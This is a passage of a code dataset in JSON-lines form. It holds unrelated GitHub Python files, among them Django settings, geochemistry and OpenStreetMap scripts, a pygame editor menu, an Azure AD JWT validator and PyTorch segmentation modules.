'redis://localhost:6379')\nCELERY_RESULT_BACKEND = 'django-db' # django-celery-results\nCELERY_ACCEPT_CONTENT = ['application/json']\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_TASK_SERIALIZER = 'json'\n\n# This is the main setting for triggering Celery. 
It is inherited in the local.py and production.py settings\n# CELERY_TASK_ALWAYS_EAGER = True\n\n# https://docs.celeryproject.org/en/stable/django/first-steps-with-django.html#extensions\n\nINSTALLED_APPS = [\n # Django apps\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.humanize',\n 'django.contrib.sites',\n 'registration', # django-registration-redux, needs to be at this position\n 'django.contrib.admin',\n\n # Third party libraries\n 'storages',\n 'django_filters',\n 'captcha',\n 'widget_tweaks',\n # Celery libraries\n 'django_celery_results',\n 'django_celery_beat',\n\n # Local apps\n 'authy',\n 'users',\n 'listings',\n 'searchprofiles',\n 'reports',\n 'api',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'najdistandjango30.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'users.context_processors.add_project_name'\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'najdistandjango30.wsgi.application'\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Amsterdam'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n","repo_name":"DonExo/NajdistanDjango3.0","sub_path":"najdistandjango30/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14614813724","text":"import numpy as np\nimport perplexfugacitydata as pf\n\n# match Stolper fig 3 @ 1373 K?\nT_iso = 1373\np_min, p_max = 1e4, 4e4\nT_min, T_max = 1372.5, 1900.5 # endpoint can't equal T_of_interest\n\nX_ferric = 0.1\ncore_eff = 0.88\n# output_sub = 'hypatia_' + str(int(core_eff * 100)) + 'coreeff_' + str(int(X_ferric * 100)) + 'ferric/'\noutput_sub = 'X_ferric_tests/'\noutput_parent_path = pf.output_parent_default + output_sub\nperplex_path = '/home/claire/Works/perple_x/'\n\n# # # # only need to run this once to get build files (i.e., bulk composition) and vertex output files\n# # # note this will first download the stellar composisions for the whole sample and then run perple_x\n# pfug.fo2_from_hypatia(p_min, p_max, n_sample=3, T_min=T_min, T_max=T_max, isotherm=T_iso,\n# X_ferric=X_ferric, core_efficiency=core_eff, planet_kwargs={'Tp': 999},\n# #solve_interior=False, --> already a parameter\n# check_comp=True, suppress_output=False, run=True, verbose=True,\n# 
output_parent_path=output_parent_path, perplex_path=perplex_path,\n# mu0_file='data_tables/mu_o2_standard.tab', compare_buffer='qfm',\n# use_local_compositon=False,\n# # use_local_composition=True, existing_dir='hypatia88Fe', # try local first\n# # restart='2MASS 23155829+3127462'\n# )\n\n# # can (re)do fo2 calculations with this using existing vertex files\n# pfug.fo2_from_local(output_parent_path=output_parent_path, mu0_file='data_tables/mu_o2_standard.tab',\n# compare_buffer='qfm', check_comp=True, suppress_output=False, isotherm=T_iso)\n#\n\n# # do solar and Earth\n# for (name, test_oxides, star) in zip(['dmm', 'sun_88Fe'], [pfug.wt_oxides_DMM, None], [None, 'sun']):\n# pfug.fo2_from_oxides(name=name, p_min=p_min, p_max=p_max, T_min=T_min, T_max=T_max, test_oxides=test_oxides,\n# X_ferric=X_ferric, isotherm=T_iso, core_efficiency=core_eff, star=star,\n# run=True, compare_buffer='qfm',\n# suppress_output=False, check_comp=True, verbose=True,\n# mu0_file='data_tables/mu_o2_standard.tab', output_parent_path=pfug.output_parent_px,\n# )\n\n\n# # # like Stolper\n# pfug.fo2_from_oxides(name='Stolper', p_min=p_min, p_max=p_max, T_min=T_min, T_max=T_max, test_oxides=pfug.wt_oxides_DMM_ext,\n# X_ferric=0.031, isotherm=T_iso,\n# run=True, compare_buffer='qfm',\n# suppress_output=False, check_comp=True, verbose=True,\n# mu0_file='data_tables/mu_o2_standard.tab', output_parent_path=pfug.output_parent_px,\n# )\n\n\n# test effect of X_ferric on mineral phases\nfor (name, X_ferric) in zip(['dmm_10', 'dmm_03'], [0.1, 0.03]):\n pf.fo2_from_oxides(name=name, p_min=p_min, p_max=p_max, T_min=T_min, T_max=T_max, test_oxides=pf.wt_oxides_DMM,\n X_ferric=X_ferric, isotherm=T_iso, core_efficiency=core_eff, star=None,\n run=True, compare_buffer='qfm',\n suppress_output=False, check_comp=True, verbose=True,\n mu0_file='data_tables/mu_o2_standard.tab', output_parent_path=pf.output_parent_default,\n )","repo_name":"clairesworld/rocky-water","sub_path":"py/minfo2/old_oxygen_fugacity_calc_local.py","file_name":"old_oxygen_fugacity_calc_local.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1383354819","text":"import xml.etree.cElementTree as ET\n\n#Parses file and corrects the not expected zip keys\n#Args: \n #osmfile: OpenStreetMap data\n #mapping: mapping dict with the problem types and the write ones\n#Returns: street_types: A dict with the problem street types\n \nOSMFILE = \"rj_map.osm\"\n\nmapping = { \n \"CEP_LD\": \"zip:right\",\n \"CEP_LE\": \"zip:left\",\n \"cep:par\": \"zip:right\",\n \"cep:impar\": \"zip:left\",\n \"addr:zipcode\": \"addr:postcode\"\n }\n\ndef audit(osmfile):\n #Parses file and calls audit_street_type function\n #Args: osmfile: OpenStreetMap data\n #Returns: street_types: A dict with the problem street types\n osm_file = open(osmfile, \"r\")\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\n if elem.tag == \"node\" or elem.tag == \"way\":\n for tag in elem.iter(\"tag\"):\n update_tags(tag, mapping)\n osm_file.close()\n\n\ndef update_tags(tag, mapping):\n postal_tag = tag.attrib['k']\n if tag.attrib['k'] in mapping:\n postal_tag = mapping[tag.attrib['k']] \n return postal_tag \n\naudit(OSMFILE)\n","repo_name":"danicastroaraujo/OpenStreetMap-DataWrangling","sub_path":"Similar_Tags.py","file_name":"Similar_Tags.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} 
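The update_tags helper in the OSM script above computes a corrected key but never writes it back to the element, and audit() discards the return value, so the file is scanned without recording or applying any fix (its docstring also promises a street_types dict that is never built). A minimal sketch of closing that loop, assuming the same mapping dict and OSMFILE as above — the audit_and_fix name and the fixed counter are illustrative additions, not part of the original script:

import xml.etree.ElementTree as ET  # cElementTree is a deprecated alias of this on modern Python

def audit_and_fix(osmfile, mapping):
    # Walk node/way elements exactly as audit() does, but apply the
    # corrected key in place and count how many tags were rewritten.
    fixed = 0
    with open(osmfile, "r") as osm_file:
        for _, elem in ET.iterparse(osm_file, events=("start",)):
            if elem.tag == "node" or elem.tag == "way":
                for tag in elem.iter("tag"):
                    key = tag.attrib["k"]
                    if key in mapping:
                        tag.set("k", mapping[key])  # write the mapped key back onto the element
                        fixed += 1
    return fixed

# usage, mirroring the original call site:
# print(audit_and_fix(OSMFILE, mapping))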
+{"seq_id":"10092106084","text":"from utils import distance\nfrom Stop import Stop\nimport numpy as np\n\nclass MoveDistance(object):\n def __init__(self, rover, dist, target_vel=2):\n self.rover = rover\n self.dist = dist\n self.target_vel = target_vel\n self.throttle = 0.2 * np.sign(target_vel)\n # Whether the rover has reached the target distance\n self.is_done = False\n # Whether this is the first time run() has been called\n self.is_first_run = True\n # Counter to keep track of how long the rover has not moved\n self.not_moved_counter = 0\n\n\n def run(self):\n # Increment not_moved_counter if the rover is not moving\n if abs(self.rover.vel) < 0.2:\n self.not_moved_counter += 1\n else:\n self.not_moved_counter = 0\n\n\n self.rover.steer = 0\n #If this is the first time run() is called, store the rover's initial position\n if self.is_first_run:\n self.start_pos = self.rover.pos\n self.is_first_run = False\n\n # Check if the rover has reached the target distance\n if not self.is_done and distance(self.rover.pos, self.start_pos) >= self.dist:\n self.is_done = True\n\n# If the rover has reached the target distance, set brake to 1 and throttle to 0\n if self.is_done:\n self.rover.brake = 1\n self.rover.throttle = 0\n# If the rover's velocity is below the target velocity, set brake to 0 and throttle to the specified value\n elif abs(self.rover.vel) < abs(self.target_vel):\n self.rover.brake = 0\n self.rover.throttle = self.throttle\n# If the rover's velocity is equal to or above the target velocity, set throttle to 0\n else:\n self.rover.throttle = 0\n\n\n def next(self):\n# If the rover has reached the target distance and is not moving, return None to indicate that this behavior is finished\n if self.is_done and abs(self.rover.vel) < 0.2:\n return None\n# If the rover has not reached the target distance, but is not moving and the throttle is not 0, return None\n# (This indicates that the rover is stuck and cannot move)\n elif not self.is_done and abs(self.rover.vel) < 0.2 and abs(self.rover.throttle) > 0 and self.not_moved_counter > 80:\n return None\n else:\n return self\n","repo_name":"HossamHammam/Rover_Vision","sub_path":"code/MoveDistance.py","file_name":"MoveDistance.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"795487480","text":"import pygame\r\nfrom settings import *\r\nfrom pygame.image import load\r\n\r\nclass Menu:\r\n def __init__(self):\r\n self.display_surface = pygame.display.get_surface()\r\n self.create_data() # Import data of tiles, needs to be before the buttons, because we need the data to make the buttons properly\r\n self.create_buttons() # Call the method to create buttons\r\n\r\n # Importing items\r\n def create_data(self):\r\n self.menu_surfaces = {}\r\n # Iterate through each key:value pair in the editor data dictionary\r\n for key, value in EDITOR_DATA.items():\r\n # If the value inside of the value \"menu\" has a value i.e not \"None\"\r\n if value[\"menu\"]:\r\n # If this value isn't already in the self.menu_surfaces dictionary\r\n if not value[\"menu\"] in self.menu_surfaces:\r\n self.menu_surfaces[value[\"menu\"]] = [(key, load(value[\"menu_surf\"]))]\r\n # In case that they both have \"terrain\" for example as the value[\"menu\"], the \"water\" surface would be ignored without this second condition\r\n else:\r\n self.menu_surfaces[value[\"menu\"]].append((key, load(value[\"menu_surf\"])))\r\n\r\n # Change self.index to change items\r\n def 
click(self, mouse_pos, mouse_button):\r\n for sprite in self.buttons:\r\n if sprite.rect.collidepoint(mouse_pos):\r\n # Check for different mouse clicks\r\n if mouse_button[1]: # Middle mouse click\r\n sprite.main_active = not sprite.main_active if sprite.items[\"alt\"] else True # Turn main_active on/off only if the button has alternative items\r\n if mouse_button[2]: # Right click\r\n sprite.switch()\r\n\r\n return sprite.get_id()\r\n\r\n def create_buttons(self):\r\n # Menu area\r\n size = 180\r\n margin = 6\r\n topleft = (WINDOW_WIDTH - size - margin, WINDOW_HEIGHT - size - margin)\r\n self.rect = pygame.Rect(topleft, (size, size))\r\n\r\n # Button area\r\n generic_button_rect = pygame.Rect(self.rect.topleft, (self.rect.width / 2, self.rect.height / 2))\r\n button_margin = 5\r\n self.tile_button_rect = generic_button_rect.copy().inflate(-button_margin, -button_margin) # Inflate increases or decreases the size of the rectangle, parameters are x and y\r\n self.coin_button_rect = generic_button_rect.move(self.rect.width / 2, 0).inflate(-button_margin, -button_margin) # The move method returns a new rect object\r\n\r\n self.enemy_button_rect = generic_button_rect.copy().move(0, self.rect.height / 2).inflate(-button_margin, -button_margin)\r\n self.palm_button_rect = generic_button_rect.move(self.rect.width / 2, self.rect.height / 2).inflate(-button_margin, -button_margin) \r\n\r\n # Create the buttons\r\n self.buttons = pygame.sprite.Group()\r\n Button(rect = self.tile_button_rect, group = self.buttons, items = self.menu_surfaces[\"terrain\"]) # First button\r\n Button(rect = self.coin_button_rect, group = self.buttons, items = self.menu_surfaces[\"coin\"])\r\n Button(rect = self.enemy_button_rect, group = self.buttons, items = self.menu_surfaces[\"enemy\"])\r\n Button(rect = self.palm_button_rect, group = self.buttons, items = self.menu_surfaces[\"palm fg\"],items_alt = self.menu_surfaces[\"palm bg\"])\r\n\r\n # Highlights the currently selected button\r\n def highlight_indicator(self, index):\r\n if EDITOR_DATA[index][\"menu\"] == \"terrain\":\r\n pygame.draw.rect(self.display_surface, BUTTON_LINE_COLOUR, self.tile_button_rect.inflate(4, 4), 5, 4) # Last parameter is border rounding\r\n if EDITOR_DATA[index][\"menu\"] == \"coin\":\r\n pygame.draw.rect(self.display_surface, BUTTON_LINE_COLOUR, self.coin_button_rect.inflate(4, 4), 5, 4) # Last parameter is border rounding\r\n if EDITOR_DATA[index][\"menu\"] == \"enemy\":\r\n pygame.draw.rect(self.display_surface, BUTTON_LINE_COLOUR, self.enemy_button_rect.inflate(4, 4), 5, 4) # Last parameter is border rounding\r\n if EDITOR_DATA[index][\"menu\"] in (\"palm bg\", \"palm fg\"): # Check if the value selected is either in palm bg or palm fg\r\n pygame.draw.rect(self.display_surface, BUTTON_LINE_COLOUR, self.palm_button_rect.inflate(4, 4), 5, 4) # Last parameter is border rounding \r\n\r\n def display(self, index):\r\n # pygame.draw.rect(self.display_surface, \"red\", self.rect)\r\n # pygame.draw.rect(self.display_surface, \"green\", self.tile_button_rect)\r\n # pygame.draw.rect(self.display_surface, \"blue\", self.coin_button_rect)\r\n # pygame.draw.rect(self.display_surface, \"yellow\", self.enemy_button_rect)\r\n # pygame.draw.rect(self.display_surface, \"brown\", self.palm_button_rect)\r\n\r\n self.buttons.update()\r\n self.buttons.draw(self.display_surface)\r\n self.highlight_indicator(index)\r\n \r\n\r\nclass Button(pygame.sprite.Sprite): \r\n # Items = foreground palm trees items_alt = background palm trees\r\n def __init__(self, rect, 
group, items, items_alt = None): # group = the group that this button sprite is part off\r\n super().__init__(group) \r\n self.image = pygame.Surface(rect.size) # Will be a plain surface with the size of the button rectangle(created above)\r\n self.rect = rect\r\n\r\n # Items\r\n self.items = {\"main\": items, \"alt\": items_alt}\r\n self.index = 0 # Determines the item we are looking at\r\n self.main_active = True # Determines whether we are looking at the main items or alternative items\r\n\r\n # Get the id (the self.index)\r\n def get_id(self):\r\n return self.items[\"main\" if self.main_active else \"alt\"][self.index][0] # If self.main is active, we return items or items_alt\r\n \r\n # Switch index \r\n def switch(self):\r\n self.index += 1\r\n # Limit the index\r\n \"\"\" Set self.index to 0 if the self.index exceeds the number of items inside main or alt. If it hasn't exceeded, don't make any changes to self.index.\r\n This means that if terrain had 3 items. After the 3rd item, it will loop back to the 1st item\r\n \"\"\"\r\n self.index = 0 if self.index >= len(self.items[\"main\" if self.main_active else \"alt\"]) else self.index \r\n\r\n # Display what we have inside of the sprite\r\n def update(self):\r\n # Fill the background of the button with this colour\r\n self.image.fill(BUTTON_BG_COLOUR)\r\n surface = self.items[\"main\" if self.main_active else \"alt\"][self.index][1] # The graphic of the surface tuple\r\n #print(surface)\r\n rect = surface.get_rect(center = (self.rect.width / 2, self.rect.height / 2))\r\n # Draw the image icon onto the button box\r\n self.image.blit(surface, rect)\r\n\r\n","repo_name":"LyleW473/Pygame-tutorials","sub_path":"Clear Code/Mario Maker/code/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72866765860","text":"# 두 용액 ( 메모리 초과 )\n# 두 포인터 사용했지만 재귀가 깊어저 메모리 초과가 된 것으로 보임\n\nimport sys\nsys.setrecursionlimit(10**6)\n\nn = int(input())\narr = list(map(int,input().split()))\narr.sort()\n\ndef check(i,j):\n global answer, answer_list\n if i == j:\n return\n \n temp = arr[i] + arr[j]\n\n if abs(temp) < answer:\n answer = temp\n answer_list = [arr[i],arr[j]]\n\n if temp > 0:\n check(i,j-1)\n elif temp < 0:\n check(i+1,j)\n else:\n return\n\nif arr[-1] <= 0:\n print(arr[-1],arr[-2])\nelif arr[0]>= 0:\n print(arr[0],arr[1])\nelse:\n answer = 2000000000\n answer_list = []\n check(0,n-1)\n print(answer_list)\n\n\n\n\n\n\n","repo_name":"junsun10/baekjoon","sub_path":"23_08/23_08_05w/2470.py","file_name":"2470.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"69876742820","text":"#Sum of a sequence\nwhile True:\n q = input(\"Do you want to calculate sum? 
(Y/N): \").lower()\n if(q==\"y\"):\n s = []\n sum=0\n print(\"Enter numbers:\")\n while True:\n try:\n x = int(input())\n s.append(x)\n if(x==0):\n break\n except ValueError:\n print(\"Invalid input, please reenter\")\n for i in s:\n sum+=i\n print(\"Sum:\",sum)\n else:\n break\n\n#Education Level\ntry:\n a = int(input(\"Enter age: \"))\n if(a<=0):\n raise ValueError\n elif(a<5):\n print(\"Too young to study\")\n elif(a==5):\n print(\"Go to Kindergarten\")\n elif(a>17):\n print(\"Go to college\")\n else:\n print(\"Go to Grade\",a-5)\nexcept ValueError:\n print(\"Invalid Age\")\n \n#get permutations of a given string\nperms = []\ndef permutate(l, b1, b2):\n if b1 == b2:\n perms.append(\"\".join(l))\n else:\n for x in range(b1, b2 + 1):\n l[x], l[b1] = l[b1], l[x]\n permutate(l, b1 + 1, b2)\n l[x], l[b1] = l[b1], l[x]\n\ns = input(\"Enter a string to permutate : \")\npermutate(list(s), 0, len(s) - 1)\nprint(\"The permutations of\",s,\"are:\")\nfor i in perms:\n print(i)\n \n ","repo_name":"apurvaumredkar/Object-Oriented-Programming-Lab","sub_path":"expt 8 - exception handling.py","file_name":"expt 8 - exception handling.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10191931862","text":"from flask import request\nfrom flask import Response\nimport jwt\nfrom jwksutils import rsa_pem_from_jwk\nimport json\nimport requests\nimport base64\n\n# https://robertoprevato.github.io/Validating-JWT-Bearer-tokens-from-Azure-AD-in-Python/\n\njwks = {}\n\nvalid_audiences = [] # id of the application prepared previously\nissuer = 'https://sts.windows.net/9885457a-2026-4e2c-a47e-32ff52ea0b8d/'\n\n\nclass InvalidAuthorizationToken(Exception):\n def __init__(self, details):\n super().__init__('Invalid authorization token: ' + details)\n\n# jwt.get_unverified header goes away in PyJWT 1.7.x\ndef getUnverifiedHeader(token):\n jwts = token.split('.')\n return json.loads( base64.b64decode(jwts[0]+'==').decode(\"utf-8\") )\n\ndef get_jwt_value(token, key):\n headers = getUnverifiedHeader(token) #jwt.get_unverified_header(token) \n if not headers:\n raise InvalidAuthorizationToken('missing headers')\n try:\n return headers[key]\n except KeyError:\n raise InvalidAuthorizationToken('missing ' + key)\n\ndef get_kid(token):\n headers = getUnverifiedHeader(token) #jwt.get_unverified_header(token)\n if not headers:\n raise InvalidAuthorizationToken('missing headers')\n try:\n return headers['kid']\n except KeyError:\n raise InvalidAuthorizationToken('missing kid')\n\ndef get_alg(token):\n headers = getUnverifiedHeader(token) #jwt.get_unverified_header(token)\n if not headers:\n raise InvalidAuthorizationToken('missing headers')\n try:\n return headers['alg']\n except KeyError:\n raise InvalidAuthorizationToken('missing alg')\n\ndef get_jwk(kid):\n for jwk in jwks['keys']:\n if jwk['kid'] == kid:\n return jwk\n raise InvalidAuthorizationToken('kid not recognized')\n\ndef get_public_key(token):\n return rsa_pem_from_jwk( get_jwk( get_kid(token) ) )\n\ndef validate_jwt(jwt_to_validate):\n alg = get_alg(jwt_to_validate) # RS256\n public_key = get_public_key(jwt_to_validate)\n\n jwt_decoded = jwt.decode(jwt_to_validate,\n public_key,\n verify=True,\n algorithms=[alg],\n audience=valid_audiences,\n issuer=issuer)\n\n # do what you wish with decoded token:\n # if we get here, the JWT is validated\n return jwt_decoded\n\ndef initWellKnownConfig( urlWellKnown ):\n global issuer \n # get the well known info & get the public 
keys\n resp = requests.get(url=urlWellKnown)\n well_known_openid_config_data = resp.json()\n jwks_uri = well_known_openid_config_data['jwks_uri']\n issuer = well_known_openid_config_data['issuer']\n # get the discovery keys\n resp = requests.get(url=jwks_uri)\n jwks.update( resp.json() )\n \ndef initAzureAD( tenantId, clientId ):\n global issuer \n global valid_audiences\n valid_audiences.append( clientId )\n initWellKnownConfig( 'https://login.microsoftonline.com/' + tenantId + '/v2.0/.well-known/openid-configuration' )\n issuer = \"https://sts.windows.net/\" + tenantId + \"/\"\n\ndef initAuthority( wellKnownMetadataEndpoint, clientId ):\n global issuer \n valid_audiences.append( clientId )\n initWellKnownConfig( wellKnownMetadataEndpoint )\n\ndef checkAuthorization(requiredScopes=None):\n # Authorization: Bearer AbCdEf123456\n accessKeyName = \"Authorization\"\n passedAccessKey = \"\"\n if accessKeyName in request.headers:\n passedAccessKey = request.headers[accessKeyName]\n\n if not passedAccessKey.startswith(\"Bearer \"):\n msg = {\"message\" : 'Unauthorized. No or wrong token received in request'}\n return None, Response( json.dumps(msg), status=401, mimetype='application/json')\n\n jwt_decoded = None \n try:\n jwt_decoded = validate_jwt( passedAccessKey[7:] )\n except Exception as ex:\n msg = {\"message\" : 'Unauthorized. Token is invalid. ' + ex.args[0] }\n return None, Response( json.dumps(msg), status=401, mimetype='application/json')\n else:\n if requiredScopes is not None and len(requiredScopes) > 0:\n jwtScopes = jwt_decoded['scp'].split()\n if not requiredScopes in jwtScopes:\n msg = {\"message\" : 'Unauthorized. Required scope(s) missing: ' + requiredScopes}\n return None, Response( json.dumps(msg), status=403, mimetype='application/json')\n\n return jwt_decoded, None\n","repo_name":"cljung/py-rest-api","sub_path":"jwtvalidator.py","file_name":"jwtvalidator.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"70761925542","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nHEADER_LINES = 5\nFILE_NAME = 'testing/1kHzcenter5ftT1.txt'\nampLeft = []\nampRight = []\ntime = []\n\n# read from file, store values\nwith open(FILE_NAME, 'r') as f:\n for i in range(HEADER_LINES):\n next(f)\n for line in f:\n try:\n row = line.rstrip('\\n')\n row = row.split('\\t')\n time.append(float(row[0]))\n ampLeft.append(float(row[1]))\n ampRight.append(float(row[3]))\n # print(rw.split('\\t'))\n except IndexError:\n pass\n\n# from MATLAB code\n\n# Physical Values\nIN2M = 0.0254 # inches to meter conversion\nc = 340.0 # m/s\nd = 6*IN2M # m\nfs = 48000 # Hz\nts = 1.0/fs\nN = 10\nmaxTau = d/c\niStart = 0 # 0 instead of 1\nsampWindow = int(maxTau/ts)\niStop = iStart + sampWindow # don't subtract 1, want 21 elements to match MATLAB code\n\n# main loop\nthetaMax = np.zeros(N)\n\nwhile iStop < len(ampLeft):\n al = ampLeft[iStart:iStop]\n alhl = al\n ar = ampRight[iStart:iStop]\n arhl = ar\n\n for i in range(len(arhl)):\n # left\n if alhl[i] >= 0:\n alhl[i] = 1\n else:\n alhl[i] = -1\n # right\n if arhl[i] >= 0:\n arhl[i] = 1\n else:\n arhl[i] = -1\n\n L = len(al) + len(ar) - 1\n\n theta = np.linspace(-90, 90, L)\n\n x = np.correlate(arhl, alhl, 'full')\n\n s = np.linspace(-L/2, L/2, L)\n\n iMax = x.argmax(axis=0)\n\n tauHat = s[iMax] * ts\n tauHat_ms = tauHat/(0.001)\n dist_inch = tauHat_ms * 0.001 * 340 * 39\n thetaHat = theta[iMax]\n thetaMax[0:N-1] = thetaMax[1:]\n thetaMax[N-1] = 
thetaHat\n thetaHat = np.mean(thetaMax)\n\n iStart = iStop\n iStop = iStart + sampWindow - 1\nplt.plot(theta, x)\nplt.show()","repo_name":"DevMajed/Passive-Sonar-Demonstration-System","sub_path":"testing/localiztion_test.py","file_name":"localiztion_test.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71742219940","text":"import torch\nfrom torch.functional import unique\nimport torch.nn as nn\nfrom torch.nn import functional as F\n\ndef get_syncbn():\n #return nn.BatchNorm2d\n return nn.SyncBatchNorm\n\ndef resize(input,\n size=None,\n scale_factor=None,\n mode='nearest',\n align_corners=None):\n return F.interpolate(input, size, scale_factor, mode, align_corners)\n\n\nclass Upsample(nn.Module):\n\n def __init__(self,\n size=None,\n scale_factor=None,\n mode='nearest',\n align_corners=None):\n super(Upsample, self).__init__()\n self.size = size\n if isinstance(scale_factor, tuple):\n self.scale_factor = tuple(float(factor) for factor in scale_factor)\n else:\n self.scale_factor = float(scale_factor) if scale_factor else None\n self.mode = mode\n self.align_corners = align_corners\n\n def forward(self, x):\n if not self.size:\n size = [int(t * self.scale_factor) for t in x.shape[-2:]]\n else:\n size = self.size\n return resize(x, size, None, self.mode, self.align_corners)\n\nclass PSPModule(nn.Module):\n \"\"\"\n Reference:\n Zhao, Hengshuang, et al. *\"Pyramid scene parsing network.\"*\n \"\"\"\n def __init__(self, features, out_features=512, sizes=(1, 2, 3, 6), norm_layer=nn.BatchNorm2d):\n super(PSPModule, self).__init__()\n self.stages = []\n self.stages = nn.ModuleList([self._make_stage(features, out_features, size, norm_layer) for size in sizes])\n self.bottleneck = nn.Sequential(\n nn.Conv2d(features+len(sizes)*out_features, out_features, kernel_size=1, padding=1, dilation=1, bias=False),\n norm_layer(out_features),\n nn.ReLU(),\n nn.Dropout2d(0.1)\n )\n\n def _make_stage(self, features, out_features, size, norm_layer):\n prior = nn.AdaptiveAvgPool2d(output_size=(size, size))\n conv = nn.Conv2d(features, out_features, kernel_size=1, bias=False)\n bn = norm_layer(out_features)\n return nn.Sequential(prior, conv, bn)\n\n def forward(self, feats):\n h, w = feats.size(2), feats.size(3)\n priors = [F.upsample(input=stage(feats), size=(h, w), mode='bilinear', align_corners=True) for stage in self.stages] + [feats]\n bottle = self.bottleneck(torch.cat(priors, 1))\n return bottle\n\n\n\nclass ASPP(nn.Module):\n \"\"\"\n Reference:\n Chen, Liang-Chieh, et al. 
*\"Rethinking Atrous Convolution for Semantic Image Segmentation.\"*\n \"\"\"\n def __init__(self, in_planes, inner_planes=256, sync_bn=False, dilations=(12, 24, 36)):\n super(ASPP, self).__init__()\n\n norm_layer = get_syncbn() if sync_bn else nn.BatchNorm2d\n self.conv1 = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),\n nn.Conv2d(in_planes, inner_planes, kernel_size=1, padding=0, dilation=1, bias=False),\n norm_layer(inner_planes),\n nn.ReLU(inplace=True))\n self.conv2 = nn.Sequential(nn.Conv2d(in_planes, inner_planes, kernel_size=1, padding=0, dilation=1, bias=False),\n norm_layer(inner_planes),\n nn.ReLU(inplace=True))\n self.conv3 = nn.Sequential(nn.Conv2d(in_planes, inner_planes, kernel_size=3,\n padding=dilations[0], dilation=dilations[0], bias=False),\n norm_layer(inner_planes),\n nn.ReLU(inplace=True))\n self.conv4 = nn.Sequential(nn.Conv2d(in_planes, inner_planes, kernel_size=3,\n padding=dilations[1], dilation=dilations[1], bias=False),\n norm_layer(inner_planes),\n nn.ReLU(inplace=True))\n self.conv5 = nn.Sequential(nn.Conv2d(in_planes, inner_planes, kernel_size=3,\n padding=dilations[2], dilation=dilations[2], bias=False),\n norm_layer(inner_planes),\n nn.ReLU(inplace=True))\n\n self.out_planes = (len(dilations) + 2) * inner_planes\n\n def get_outplanes(self):\n return self.out_planes\n\n def forward(self, x):\n _, _, h, w = x.size()\n feat1 = F.upsample(self.conv1(x), size=(h, w), mode='bilinear', align_corners=True)\n feat2 = self.conv2(x)\n feat3 = self.conv3(x)\n feat4 = self.conv4(x)\n feat5 = self.conv5(x)\n aspp_out = torch.cat((feat1, feat2, feat3, feat4, feat5), 1)\n return aspp_out\n\n","repo_name":"hzhupku/IFA","sub_path":"pyseg/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"35"} +{"seq_id":"75082359460","text":"from rest_framework import serializers\nfrom theBlog import models\nfrom django.contrib import messages\nfrom .users import UserSerializer\n\nclass Base64ImageField(serializers.ImageField):\n def to_internal_value(self, data):\n from django.core.files.base import ContentFile\n import base64\n import six\n import uuid\n\n # Check if this is a base64 string\n if isinstance(data, six.string_types):\n # Check if the base64 string is in the \"data:\" format\n if 'data:' in data and ';base64,' in data:\n # Break out the header from the base64 content\n header, data = data.split(';base64,')\n\n # Try to decode the file. 
